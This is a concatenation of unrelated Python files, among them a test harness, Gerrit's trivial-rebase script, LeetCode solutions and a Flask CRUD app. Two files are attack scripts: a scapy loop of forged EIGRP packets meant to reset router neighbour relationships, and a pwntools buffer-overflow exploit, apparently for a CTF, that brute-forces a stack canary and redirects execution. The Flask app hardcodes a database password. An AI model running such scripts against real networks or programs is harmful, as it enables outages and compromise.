self.listed_count = listed_count
self.mention_count = metion_count
##User
self.follower_count_user = follower_count_user
self.friend_count_user = friend_count_user
self.total_favorite = total_favorite
self.total_posts = total_posts
|
import time
from urllib.parse import urlparse, parse_qs
from threading import Thread
from threading import Lock
from .server import HttpServer
from .configuration import Configuration
from .scenario import Scenario
from .clients.android import AndroidClient
from .clients.ios import IosClient
from .clients.osx import OsxClient
from .storage import Storage
from .log import Log
class TestLab(object):
def __init__(self, path_or_json):
RequestHandler.TEST_LAB = self
self.configuration = Configuration(path_or_json)
self.server = None
self.server_url = self.configuration.json.get('server_url', 'http://127.0.0.1:8010')
self.server_url = str(self.server_url)
if ':' in self.server_url:
index = self.server_url.rfind(':')
self.server_port = int(self.server_url[index+1:])
self.server_url = self.server_url[:index]
else:
self.server_port = 8000
self.server_thread = None
self.monitor_thread = None
self.start_time_monitor = 0
self.results_storage = Storage()
self.scenarios = []
for scenario in self.configuration.json['scenarios']:
self.scenarios.append(Scenario(scenario))
self.clients = []
self.clients_count = 0
self._create_clients()
self._terminate = False
self.mutex = Lock()
def run(self):
self._run_server()
for scenario in self.scenarios:
self.results_storage.push_test_case(scenario.name)
self._run_monitor(scenario)
try:
self._run_scenario(scenario)
except RuntimeError as error:
Log.error(error)
self._terminate = True
self.monitor_thread.join()
self._stop_server()
self._print_results()
def _run_server(self):
Log.info('Run server')
def worker():
self.server.serve_forever()
self.server = HttpServer.start(url=self.server_url, port=self.server_port,
request_handler_class=RequestHandler)
self.server_thread = Thread(target=worker)
self.server_thread.start()
def _run_monitor(self, scenario):
Log.info('Run monitor')
def worker():
self.start_time_monitor = time.time()
while time.time() <= self.start_time_monitor + scenario.timeout:
time.sleep(1)
with self.mutex:
if self._terminate:
break
current = self.results_storage.get_records_count(scenario.name)
elapsed = int(time.time() - self.start_time_monitor)
Log.debug('Progress: {}s {}/{}', elapsed, current, self.clients_count)
if current >= self.clients_count:
break
self.monitor_thread = Thread(target=worker)
self.monitor_thread.start()
def _run_scenario(self, scenario):
def worker(client, scenario_name):
self.clients_count += client.launch(self.configuration, scenario_name)
threads = []
for client in self.clients:
thread = Thread(target=worker, args=(client, scenario.name))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def _stop_server(self):
Log.info('Stop server')
if self.server:
self.server.shutdown()
self.server_thread.join()
self.server = None
def _create_clients(self):
threads = []
def create(platform):
clients = {
'android': AndroidClient,
'ios': IosClient,
'osx': OsxClient,
}
if platform not in clients:
return None
client = clients[platform](self.configuration)
client.server_url = 'http://{}:{}'.format(self.server_url, self.server_port)
self.clients.append(client)
self.clients_count += len(client.devices)
for platform in self.configuration.json['clients']:
thread = Thread(target=create, args=(platform, ))
thread.start()
threads.append(thread)
for thread in threads:
thread.join()
def _print_results(self):
Log.whitespace()
Log.result('Tests result:')
success = len(self.results_storage.results) == len(self.scenarios)
for test_case in self.results_storage.results:
Log.result(' Test: {}', test_case.name)
for record in test_case.results:
Log.result(' Platform: {}, Name: {}, ID: {}, Result code: {}, Duration: {}s', record.client_platform,
record.client_name,
record.client_id,
record.result_code,
record.duration)
success = success and (record.result_code == 0)
success = success and len(test_case.results) == self.clients_count
Log.result('Sumary: {}', 'Success' if success else 'Failed')
exit(0 if success else 1)
def add_result(self, code, scenario, client_id, client_name, client_platform):
elapsed_seconds = int(time.time() - self.start_time_monitor)
self.results_storage.add_result(scenario, code, client_id, client_name, client_platform, elapsed_seconds)
class RequestHandler:
TEST_LAB = None
def __init__(self, server):
self.response = None
self.server = server
def handle(self, _, payload):
try:
parsed = urlparse(payload)
params = parse_qs(parsed.query)
Log.debug('Got Payload: {}', payload)
if parsed.path == '/result' and 'code' in params or 'scenario' in params:
code = int(params['code'][0])
scenario = params['scenario'][0]
client_id = params['id'][0] if 'id' in params else 'unknown'
client_name = params['name'][0] if 'name' in params else 'unknown'
client_platform = params['platform'][0] if 'platform' in params else 'unknown'
with RequestHandler.TEST_LAB.mutex:
RequestHandler.TEST_LAB.add_result(code, scenario, client_id, client_name, client_platform)
except RuntimeError:
self.server.send('error'.encode())
else:
self.server.send('ok'.encode())
|
#!/usr/bin/env python2.6
# Copyright (c) 2010, Code Aurora Forum. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
# # Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# # Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# # Neither the name of Code Aurora Forum, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED "AS IS" AND ANY EXPRESS OR IMPLIED
# WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR
# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN
# IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
# This script is designed to detect when a patchset uploaded to Gerrit is
# 'identical' (determined via git-patch-id) and reapply reviews onto the new
# patchset from the previous patchset.
# Get usage and help info by running: ./trivial_rebase.py --help
# Documentation is available here: https://www.codeaurora.org/xwiki/bin/QAEP/Gerrit
import json
from optparse import OptionParser
import subprocess
from sys import exit
class CheckCallError(OSError):
"""CheckCall() returned non-0."""
def __init__(self, command, cwd, retcode, stdout, stderr=None):
OSError.__init__(self, command, cwd, retcode, stdout, stderr)
self.command = command
self.cwd = cwd
self.retcode = retcode
self.stdout = stdout
self.stderr = stderr
def CheckCall(command, cwd=None):
"""Like subprocess.check_call() but returns stdout.
Works on python 2.4
"""
try:
process = subprocess.Popen(command, cwd=cwd, stdout=subprocess.PIPE)
std_out, std_err = process.communicate()
except OSError, e:
raise CheckCallError(command, cwd, e.errno, None)
if process.returncode:
raise CheckCallError(command, cwd, process.returncode, std_out, std_err)
return std_out, std_err
def GsqlQuery(sql_query, server, port):
"""Runs a gerrit gsql query and returns the result"""
gsql_cmd = ['ssh', '-p', port, server, 'gerrit', 'gsql', '--format',
'JSON', '-c', sql_query]
try:
(gsql_out, gsql_stderr) = CheckCall(gsql_cmd)
except CheckCallError, e:
print "return code is %s" % e.retcode
print "stdout and stderr is\n%s%s" % (e.stdout, e.stderr)
raise
new_out = gsql_out.replace('}}\n', '}}\nsplit here\n')
return new_out.split('split here\n')
def FindPrevRev(changeId, patchset, server, port):
"""Finds the revision of the previous patch set on the change"""
sql_query = ("\"SELECT revision FROM patch_sets,changes WHERE "
"patch_sets.change_id = changes.change_id AND "
"patch_sets.patch_set_id = %s AND "
"changes.change_key = \'%s\'\"" % ((patchset - 1), changeId))
revisions = GsqlQuery(sql_query, server, port)
json_dict = json.loads(revisions[0], strict=False)
return json_dict["columns"]["revision"]
def GetApprovals(changeId, patchset, server, port):
"""Get all the approvals on a specific patch set
Returns a list of approval dicts"""
sql_query = ("\"SELECT value,account_id,category_id FROM patch_set_approvals "
"WHERE patch_set_id = %s AND change_id = (SELECT change_id FROM "
"changes WHERE change_key = \'%s\') AND value <> 0\""
% ((patchset - 1), changeId))
gsql_out = GsqlQuery(sql_query, server, port)
approvals = []
for json_str in gsql_out:
dict = json.loads(json_str, strict=False)
if dict["type"] == "row":
approvals.append(dict["columns"])
return approvals
def GetEmailFromAcctId(account_id, server, port):
"""Returns the preferred email address associated with the account_id"""
sql_query = ("\"SELECT preferred_email FROM accounts WHERE account_id = %s\""
% account_id)
email_addr = GsqlQuery(sql_query, server, port)
json_dict = json.loads(email_addr[0], strict=False)
return json_dict["columns"]["preferred_email"]
def GetPatchId(revision):
git_show_cmd = ['git', 'show', revision]
patch_id_cmd = ['git', 'patch-id']
patch_id_process = subprocess.Popen(patch_id_cmd, stdout=subprocess.PIPE,
stdin=subprocess.PIPE)
git_show_process = subprocess.Popen(git_show_cmd, stdout=subprocess.PIPE)
return patch_id_process.communicate(git_show_process.communicate()[0])[0]
def SuExec(server, port, private_key, as_user, cmd):
suexec_cmd = ['ssh', '-l', "Gerrit Code Review", '-p', port, server, '-i',
private_key, 'suexec', '--as', as_user, '--', cmd]
CheckCall(suexec_cmd)
def DiffCommitMessages(commit1, commit2):
log_cmd1 = ['git', 'log', '--pretty=format:"%an %ae%n%s%n%b"',
commit1 + '^!']
commit1_log = CheckCall(log_cmd1)
log_cmd2 = ['git', 'log', '--pretty=format:"%an %ae%n%s%n%b"',
commit2 + '^!']
commit2_log = CheckCall(log_cmd2)
if commit1_log != commit2_log:
return True
return False
def Main():
server = 'localhost'
usage = "usage: %prog <required options> [--server-port=PORT]"
parser = OptionParser(usage=usage)
parser.add_option("--change", dest="changeId", help="Change identifier")
parser.add_option("--project", help="Project path in Gerrit")
parser.add_option("--commit", help="Git commit-ish for this patchset")
parser.add_option("--patchset", type="int", help="The patchset number")
parser.add_option("--private-key-path", dest="private_key_path",
help="Full path to Gerrit SSH daemon's private host key")
parser.add_option("--server-port", dest="port", default='29418',
help="Port to connect to Gerrit's SSH daemon "
"[default: %default]")
(options, args) = parser.parse_args()
if not options.changeId:
parser.print_help()
exit(0)
if options.patchset == 1:
# Nothing to detect on first patchset
exit(0)
prev_revision = None
prev_revision = FindPrevRev(options.changeId, options.patchset, server,
options.port)
if not prev_revision:
# Couldn't find a previous revision
exit(0)
prev_patch_id = GetPatchId(prev_revision)
cur_patch_id = GetPatchId(options.commit)
if cur_patch_id.split()[0] != prev_patch_id.split()[0]:
# patch-ids don't match
exit(0)
# Patch ids match. This is a trivial rebase.
# In addition to patch-id we should check if the commit message changed. Most
# approvers would want to re-review changes when the commit message changes.
changed = DiffCommitMessages(prev_revision, options.commit)
if changed:
# Insert a comment into the change letting the approvers know only the
# commit message changed
comment_msg = ("\'--message=New patchset patch-id matches previous patchset"
", but commit message has changed.'")
comment_cmd = ['ssh', '-p', options.port, server, 'gerrit', 'approve',
'--project', options.project, comment_msg, options.commit]
CheckCall(comment_cmd)
exit(0)
# Need to get all approvals on prior patch set, then suexec them onto
# this patchset.
approvals = GetApprovals(options.changeId, options.patchset, server,
options.port)
gerrit_approve_msg = ("\'Automatically re-added by Gerrit trivial rebase "
"detection script.\'")
for approval in approvals:
# Note: Sites with different 'copy_min_score' values in the
# approval_categories DB table might want different behavior here.
# Additional categories should also be added if desired.
if approval["category_id"] == "CRVW":
approve_category = '--code-review'
elif approval["category_id"] == "VRIF":
# Don't re-add verifies
#approve_category = '--verified'
continue
elif approval["category_id"] == "SUBM":
# We don't care about previous submit attempts
continue
else:
print "Unsupported category: %s" % approval
exit(0)
score = approval["value"]
gerrit_approve_cmd = ['gerrit', 'approve', '--project', options.project,
'--message', gerrit_approve_msg, approve_category,
score, options.commit]
email_addr = GetEmailFromAcctId(approval["account_id"], server,
options.port)
SuExec(server, options.port, options.private_key_path, email_addr,
' '.join(gerrit_approve_cmd))
exit(0)
if __name__ == "__main__":
Main()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models
# Create your models here.
class DeviceInfo(models.Model):
dtype=models.CharField(max_length=12)
dname=models.CharField(max_length=16,default='环泰设备')
dmac=models.CharField(max_length=40)
dbrand = models.CharField(max_length=20,default='')
gcontrolcode = models.CharField(max_length=10, default='')
ggateway = models.ForeignKey('sc_gateway.GatewayInfo')
|
# 筛选淘汰(过滤规则在这里修改)
from CalobjValue import decodechrom
def calfitValue(pop, chrom_length, max_value):
"""
约束条件筛选
:param pop: 种群
:param chrom_length:基因编码长度
:param max_value: 最大值
:return: 过滤后种群
"""
new_pop = []
for x in pop:
if decodechrom(x[0], chrom_length, max_value) != 0 and decodechrom(x[1], chrom_length, max_value) != 0:
new_pop.append(x)
return new_pop
def boolcondition(x):
c = 0
num = len(x[0])
for i in range(num):
if x[0][i] == 1 or x[1][i] == 1:
c = 1
break
if c == 0:
return False
return True
|
max=-30000000
r="si"
while r=="si" :
valor = float (raw_input("Ingrese Valor:"))
if valor>max :
max=valor
r=raw_input("Hay mas datos:")
print max, "el mayor es:" |
from django.urls import path
from .views import contact_info,send
app_name='contact'
urlpatterns = [
path('',contact_info,name='contact'),
path('sent/',send,name='sent'),
]
|
# 输入一棵二叉树的根节点,判断该树是不是平衡二叉树。如果某二叉树中任意节点的左右子树的深度相差不超过1,那么它就是一棵平衡二叉树。
#
#
#
# 示例 1:
#
# 给定二叉树 [3,9,20,null,null,15,7]
#
# 3
# / \
# 9 20
# / \
# 15 7
# 返回 true 。
#
# 示例 2:
#
# 给定二叉树 [1,2,2,3,3,null,null,4,4]
#
# 1
# / \
# 2 2
# / \
# 3 3
# / \
# 4 4
# 返回 false 。
#
#
#
# 限制:
#
# 1 <= 树的结点个数 <= 10000
# 注意:本题与主站 110 题相同:https://leetcode-cn.com/problems/balanced-binary-tree/
#
#
#
# 来源:力扣(LeetCode)
# 链接:https://leetcode-cn.com/problems/ping-heng-er-cha-shu-lcof
# 著作权归领扣网络所有。商业转载请联系官方授权,非商业转载请注明出处。
# Definition for a binary tree node.
class TreeNode:
def __init__(self, x):
self.val = x
self.left = None
self.right = None
class Solution:
def treeHeight(self, root: TreeNode) -> int:
if not root:
return 0
return max(self.treeHeight(root.left), self.treeHeight(root.right)) + 1
def isBalanced(self, root: TreeNode) -> bool:
if not root:
return True
leftHeight = self.treeHeight(root.left)
rightHeight = self.treeHeight(root.right)
if abs(leftHeight - rightHeight) > 1:
return False
return self.isBalanced(root.left) and self.isBalanced(root.right) |
#!/usr/bin/env python3
#Import time so we can set a sleep timer
import time
#Import scapy
from scapy.all import *
#Import EIGRP
load_contrib('eigrp')
#Create a loop
for i in range (0, 50):
#Send EIGRP packet to reset neighbor relationships.
#Change the source IP address (src) to the correct IP address
#Change Autonomous System number (asn) to the correct number
sendp(Ether()/IP(src="192.168.122.171",dst="224.0.0.10")/EIGRP(asn=100,
tlvlist=[EIGRPParam(k1=255, k2=255, k3=255, k4=255, k5=255),EIGRPSwVer()]))
#Add a one second delay
time.sleep(1)
#Credits:
#Warning: You visit any sites listed at your own risk.
#https://scapy.readthedocs.io/_/downloads/en/latest/pdf/
#https://scapy.ml.secdev.narkive.com/mKiGyM29/scapy-eigrp-layer-use-cases
|
from flask import Flask, render_template, request, session, copy_current_request_context
from DBcm import UseDataBase, ConnectionError, CredentialError, SQLError
app1 = Flask(__name__)
app1.config['dbconfig'] = {'host': '127.0.0.1',
'user': 'root',
'password': '228sanya228',
'database': 'subdbd', }
@app1.route('/')
@app1.route('/main')
def main():
return render_template('start.html', )
@app1.route('/regions')
def regions():
try:
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """select id, region_name
from firm_region"""
cursor.execute(_SQL)
contents = cursor.fetchall()
titles = ('ID', 'Регион')
return render_template('regions.html',
the_title='Регионы',
row_titles=titles,
the_data=contents, )
except ConnectionError as err:
print('Trouble with SQL-server', str(err))
except CredentialError as err:
print('User-id/Password issues. Error:', str(err))
except SQLError as err:
print('Is your query correct? Error: ', str(err))
except Exception as err:
print('Something went wrong:', str(err))
return 'Error'
@app1.route('/firm')
def firms():
try:
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """select id, id_region, firm_name, firm_info
from firm""" # CHANGEEEE for id_reg = name_reg
cursor.execute(_SQL)
contents = cursor.fetchall()
titles = ('ID', 'Регион', 'Название фирмы', 'Информация')
return render_template('firm.html',
the_title='Фирмы',
row_titles=titles,
the_data=contents, )
except ConnectionError as err:
print('Trouble with SQL-server', str(err))
except CredentialError as err:
print('User-id/Password issues. Error:', str(err))
except SQLError as err:
print('Is your query correct? Error: ', str(err))
except Exception as err:
print('Something went wrong:', str(err))
return 'Error'
@app1.route('/firmservice')
def firmservice():
try:
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """select id_firm, id_service
from firm_service""" # CHANGEEEE
# for id_firm(service) = firm_name
cursor.execute(_SQL)
contents = cursor.fetchall()
titles = ('Фирма', 'Услуга')
return render_template('firmservice.html',
the_title='Услуги фирм',
row_titles=titles,
the_data=contents, )
except ConnectionError as err:
print('Trouble with SQL-server', str(err))
except CredentialError as err:
print('User-id/Password issues. Error:', str(err))
except SQLError as err:
print('Is your query correct? Error: ', str(err))
except Exception as err:
print('Something went wrong:', str(err))
return 'Error'
@app1.route('/services')
def services():
try:
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """select id, service_name
from services"""
cursor.execute(_SQL)
contents = cursor.fetchall()
titles = ('ID услуги', 'Услуга')
return render_template('services.html',
the_title='Услуги',
row_titles=titles,
the_data=contents, )
except ConnectionError as err:
print('Trouble with SQL-server', str(err))
except CredentialError as err:
print('User-id/Password issues. Error:', str(err))
except SQLError as err:
print('Is your query correct? Error: ', str(err))
except Exception as err:
print('Something went wrong:', str(err))
return 'Error'
################
# ADD REGION #
################
@app1.route('/addreg')
def show_addreg():
return render_template('addreg.html')
@app1.route('/regions', methods=['POST'])
def addregion():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """insert into firm_region
(id, region_name)
values
(%s, %s)"""
cursor.execute(_SQL, (request.form['id_reg'],
request.form['name_reg'],
))
return regions()
################
# ADD FIRM #
################
@app1.route('/addfirm')
def show_addfirm():
return render_template('addfirm.html')
@app1.route('/firm', methods=['POST'])
def addfirm():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """insert into firm
(id, id_region, firm_name, firm_info)
values
(%s, %s, %s, %s)"""
cursor.execute(_SQL, (request.form['id_firm'],
request.form['id_region'],
request.form['firm_name'],
request.form['firm_info'],
))
return firms()
########################
# ADD FIRM SERVICE #
########################
@app1.route('/addfirmservice')
def show_addfirmservice():
return render_template('addfirmservice.html')
@app1.route('/firmservice', methods=['POST'])
def addfirmservice():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """insert into firm_service
(id_firm, id_service)
values
(%s, %s)"""
cursor.execute(_SQL, (request.form['id_firm'],
request.form['id_service'],
))
return firmservice()
########################
# ADD SERVICE #
########################
@app1.route('/addservices')
def show_addservices():
return render_template('addservices.html')
@app1.route('/services', methods=['POST'])
def addservices():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """insert into services
(id, service_name)
values
(%s, %s)"""
cursor.execute(_SQL, (request.form['id_service'],
request.form['service_name'],
))
return services()
########################
# DELETE REGION #
########################
@app1.route('/chooseid')
def show_choose_id():
return render_template('chooseid.html')
@app1.route('/delregions', methods=['POST'])
def show_delregion():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """delete from firm_region where id=%(my_id)s"""
cursor.execute(_SQL, {'my_id': request.form['id_edit_del']})
return regions()
########################
# DELETE FIRM #
########################
@app1.route('/chooseidfirm')
def show_choose_id_firm():
return render_template('chooseidfirm.html')
@app1.route('/delfirm', methods=['POST'])
def show_delfirm():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """delete from firm where id=%(my_id)s"""
cursor.execute(_SQL, {'my_id': request.form['id_edit_del']})
return firms()
########################
# DELETE FIRMSERVICE #
########################
@app1.route('/chooseidfirmservice')
def show_choose_id_firmservice():
return render_template('chooseidfirmservice.html')
@app1.route('/delfirmservice', methods=['POST'])
def show_delfirmservice():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """delete from firm_service where id_firm=%(my_id_firm)s and id_service=%(my_id_service)s"""
cursor.execute(_SQL, {'my_id_firm': request.form['id_edit_del_firm'],
'my_id_service': request.form['id_edit_del_service']
})
return firmservice()
########################
# DELETE SERVICE #
########################
@app1.route('/chooseidservice')
def show_choose_id_service():
return render_template('chooseidservice.html')
@app1.route('/delservice', methods=['POST'])
def show_delservice():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """delete from services where id=%(my_id)s"""
cursor.execute(_SQL, {'my_id': request.form['id_edit_del']})
return services()
########################
# EDIT REGION #
########################
@app1.route('/editregion')
def show_chooseregion():
return render_template('chooseidedit.html',
)
@app1.route('/editregions', methods=['POST'])
def show_editregion():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """select * from firm_region where id=%(my_id)s"""
cursor.execute(_SQL, {'my_id': request.form['id_edit_del']})
contents = cursor.fetchall()
return render_template('editreg.html',
id_reg=contents[0][0],
reg_name=contents[0][1]
)
@app1.route('/editedregions', methods=['POST'])
def show_editedregion():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """update firm_region set region_name=%(my_name)s where id=%(my_id)s"""
cursor.execute(_SQL, {'my_id': request.form['id_reg'],
'my_name': request.form['name_reg']})
return regions()
########################
# EDIT FIRM #
########################
@app1.route('/editfirm')
def show_choosefirm():
return render_template('chooseideditfirm.html',
)
@app1.route('/editfirms', methods=['POST'])
def show_editfirm():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """select * from firm where id=%(my_id)s"""
cursor.execute(_SQL, {'my_id': request.form['id_edit_del']})
contents = cursor.fetchall()
return render_template('editfirm.html',
id_firm=contents[0][0],
id_reg=contents[0][1],
firm_name=contents[0][2],
firm_info=contents[0][3]
)
@app1.route('/editedfirms', methods=['POST'])
def show_editedfirm():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """update firm
set id_region=%(my_id_reg)s, firm_name=%(my_name)s, firm_info=%(my_info)s
where id=%(my_id)s"""
cursor.execute(_SQL, {'my_id': request.form['id'],
'my_id_reg': request.form['id_reg'],
'my_info': request.form['info_firm'],
'my_name': request.form['name_firm']})
return firms()
########################
# EDIT SERVICES #
########################
@app1.route('/editservice')
def show_chooseservice():
return render_template('chooseideditservice.html',
)
@app1.route('/editservices', methods=['POST'])
def show_editservice():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """select * from services where id=%(my_id)s"""
cursor.execute(_SQL, {'my_id': request.form['id_edit_del']})
contents = cursor.fetchall()
return render_template('editservice.html',
id_service=contents[0][0],
name_service=contents[0][1],
)
@app1.route('/editedservices', methods=['POST'])
def show_editedservice():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL = """update services
set service_name=%(my_name)s
where id=%(my_id)s"""
cursor.execute(_SQL, {'my_id': request.form['id_service'],
'my_name': request.form['name_service']})
return services()
########################
# SEARCHING #
########################
@app1.route('/searching')
def searching():
return render_template('search.html',
)
@app1.route('/searched', methods=['POST'])
def searched():
with UseDataBase(app1.config['dbconfig']) as cursor:
_SQL1 = """select id
from firm_region
where region_name=%(reg_name)s"""
cursor.execute(_SQL1, {'reg_name': request.form['reg_name']})
contents = cursor.fetchall()
id_reg = contents[0][0]
_SQL2 = """select id
from services
where service_name=%(serv_name)s"""
cursor.execute(_SQL2, {'serv_name': request.form['service_name']})
contents = cursor.fetchall()
id_serv = contents[0][0]
_SQL = """select *
from firm f, firm_region r, firm_service fs
where f.id_region=%(id_reg)s and fs.id_service=%(id_serv)s
and r.id=f.id_region and fs.id_firm=f.id"""
cursor.execute(_SQL, {'id_serv': str(id_serv), 'id_reg': str(id_reg)})
contents = cursor.fetchall()
edited_conents = []
for row in contents:
add = []
add.append(row[2])
add.append(request.form['reg_name'])
add.append(request.form['service_name'])
add.append(row[3])
edited_conents.append(add)
titles = ('Название фирмы', 'Регион', 'Услуга', 'Информация о фирме')
return render_template('searched.html',
the_title='Найденные фирмы',
row_titles=titles,
the_data=edited_conents, )
if __name__ == '__main__':
app1.run()
|
#Given an array nums and a value val, remove all instances
#of that value in-place and return the new length.
#Do not allocate extra space for another array, you must do this by
#modifying the input array in-place with O(1) extra memory.
#The order of elements can be changed. It doesn't matter what you leave beyond
#the new length.
def remove(nums, val):
if len(nums) < 1:
return len(nums)
if len(nums) ==1 and nums[0]!=val:
return len(nums)
elif len(nums) ==1 and nums[0]== val:
return 0
i = 0
j = 0
for j in nums:
if j != val:
nums[i]=j
i+=1
return i
#print(remove([3,2,2,3], 3))
print(remove([0,1,2,2,3,0,2], 2))
|
import sys, os
path = os.getcwd()
os.chdir('D')
sys.path.append(os.path.join(path, "D"))
import kbqa_main
os.chdir('..')
sys.path.remove(os.path.join(path, "D"))
|
#!/usr/bin/python
import json
import pymysql
def json_serial(obj):
return str(obj)
result = {"error": "unknown"}
try:
with open("charge-controller.json", mode="r", encoding="utf-8") as data:
chargeController = json.load(data)
with open("db-config.json", "r") as f:
db = json.load(f)
conn = pymysql.connect(
db=db["db"],
user=db["user"],
password=db["password"],
host=db["host"]
)
c = conn.cursor()
result = {}
for tableName in chargeController["data"]:
rowResult = {}
sql = "SELECT * FROM %s where unit = 1 ORDER BY create_date DESC LIMIT 1" % tableName
c.execute(sql)
row = c.fetchone()
fields = []
for field in c.description:
fields.append(field[0])
for i in range(len(fields)):
rowResult[fields[i]] = row[i]
result[tableName] = rowResult
conn.commit()
c.close()
except Exception as e:
result = {"error": str(e), "type": type(e)}
print("Content-Type: application/json")
print()
print(json.dumps(result, default=json_serial, sort_keys = True, indent = 2))
|
from flask import Flask
from flask import render_template
from flask import request
import neuroid
app = Flask(__name__)
@app.route('/')
def index():
return render_template("index.html")
@app.route("/input", methods=["POST"])
def input():
umbr = float(request.form["umbrValue"])
beta = float(request.form["BetaValue"])
kr = float(request.form["KrValue"])
maxcount = int(request.form["maxcountValue"])
result = neuroid.run(umbr, beta, kr, maxcount)
return render_template('index.html', results=result)
|
from pycep_correios import get_address_from_cep, WebService
pergunta = input('Digite seu cep:\n')
#VERIIFAR DADOS FORNECIDOS PELO USUARIO
valida_dados = len(pergunta)
while(valida_dados != 8):
print('Cep incorrreto\n')
pergunta = input('Digite seu cep novamente\n')
valida_dados = len(pergunta)
|
#!/usr/bin/env python
from pwn import *
import string
pico = 0
known_canary = 'IHwj'
check = string.letters + "0123456789"
# for char in check:
# if pico:
# r = process("./vuln")
# else:
# #env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./pico32.libc.so.6")}
# r = process("./bof3")
# # gdb.attach(r, '''
# # b *0x8048868
# # c
# # ''')
# payload = ''
# payload += '80\n'
# payload += 'A'*32
# payload += known_canary
# payload += char
# log.info("Testing canary " + known_canary + char)
# r.send(payload)
# output = r.recvall()
# print "output: " + output
# if "Smashing" not in output:
# known_canary += char
# print 'Canary: ' + known_canary
# # if len(known_canary) == 4:
# # print 'Canary: ' + known_canary
# print 'Canary: ' + known_canary
if pico:
r = process("./vuln")
else:
#env = {"LD_PRELOAD": os.path.join(os.getcwd(), "./pico32.libc.so.6")}
r = process("./bof3")
gdb.attach(r, '''
b *0x80488b1
c
''')
WIN = 0x80486eb
payload = ''
payload += '80\n'
payload += 'A'*32
payload += known_canary
payload += 'A'*16
payload += p32(WIN)
r.send(payload)
r.interactive() |
from django.contrib import admin
from django_summernote.admin import SummernoteModelAdmin
# Register your models here.
from .models import Meals,Category
class MealsAdmin(SummernoteModelAdmin,admin.ModelAdmin): # instead of ModelAdmin
summernote_fields = '__all__'
list_display = ['name', 'preperation_time' ,'price']
search_fields=['name','price']
list_filter=('category','people',)
admin.site.register(Meals,MealsAdmin)
admin.site.register(Category) |
import base64
import sys
import os, io
import json
import time
import aiounittest
import asyncio
import unittest
import aiohttp
import numpy as np
from match_image.do_handler import MatchImageIndexDelete
from match_image.search_labels import SearchImageLabels
from match_image import create_index
from match_image import utils
from PIL import Image
from unittest import mock
def SetAddLabel(label_type=None):
# ===============================================================
# 设置用于创建索引的标签
if label_type == 1:
label = "C'`~!@#$%^&*( )-_=+,<.>/?\|\t\n"
elif label_type == 2:
label = "C·~!@#¥%……&*()-=——+【{}】:“;‘’”,。、《 》?"
else:
label = "CTest://image/label.jpg"
return label
def SetAddImage():
# ===============================================================
# 设置用于创建索引的图片
image_path = sys.path[0] + "/image001.jpg"
img = Image.open(image_path)
img = img.convert('RGB')
img = utils.Normal(img, 3)
img_rgb_array = np.array(img)[:, :, :3]
return img_rgb_array
async def CheckAddImageLabelResult(image, label):
# ===============================================================
# 检查索引创建结果是否符合预期
try:
result_1 = await SearchImageLabels(image)
ifconfi_1 = label not in result_1
result_2 = await create_index.AddImageLabel(image, label)
ifconfi_2 = result_2
for i in range(30):
result_3 = await SearchImageLabels(image)
if label in result_3:
ifconfi_3 = True
break
else:
ifconfi_3 = False
time.sleep(1)
if ifconfi_1 and ifconfi_2 and ifconfi_3:
return True
else:
return False
except BaseException as err:
return False
async def CatchESConnectError(image, label):
# ===============================================================
# 捕获ES服务连接失败的异常
try:
result = await create_index.AddImageLabel(image, label)
return False
except BaseException as err:
ifcondi_1 = bool(err.code[:3] == "500")
ifcondi_2 = bool(err.cause == "Failed to connect to ElasticSearch.")
if ifcondi_1 and ifcondi_2:
return True
else:
return False
async def CatchDLConnectError(image, label):
# ===============================================================
# 捕获DL服务连接失败的异常
try:
result = await create_index.AddImageLabel(image, label)
return False
except BaseException as err:
ifcondi_1 = bool(err.code[:3] == "500")
ifcondi_2 = bool(err.cause == "Failed to connect to DL-Inference-Serving.")
if ifcondi_1 and ifcondi_2:
return True
else:
return False
async def CatchESInitError(image, label):
# ===============================================================
# 捕获ES服务未初始化的异常
try:
result = await create_index.AddImageLabel(image, label)
return False
except BaseException as err:
ifcondi_1 = bool(err.code[:3] == "500")
ifcondi_2 = bool(err.cause == "Service is not initialized.")
if ifcondi_1 and ifcondi_2:
return True
else:
return False
